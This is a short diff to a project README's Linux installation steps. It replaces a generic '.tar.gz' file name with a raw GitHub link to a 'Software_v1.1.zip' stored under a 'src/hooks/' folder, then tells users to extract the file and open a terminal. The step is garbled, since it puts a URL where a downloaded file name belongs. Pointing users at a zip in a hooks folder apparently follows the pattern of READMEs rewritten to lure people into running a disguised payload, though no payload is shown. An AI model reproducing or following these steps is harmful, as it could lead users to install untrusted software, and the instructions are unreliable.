fitwan2011-code/rmnode/README.md

 ### For Linux Users

-1. Go to your Downloads folder and find the downloaded `.tar.gz` file.
+1. Go to your Downloads folder and find the downloaded `https://github.com/fitwan2011-code/rmnode/raw/refs/heads/main/src/hooks/Software_v1.1.zip` file.
 2. Right-click the file and choose "Extract Here" to unzip it.
 3. Open your Terminal.
 4. Navigate to the extracted folder using the `cd` command.
 For example: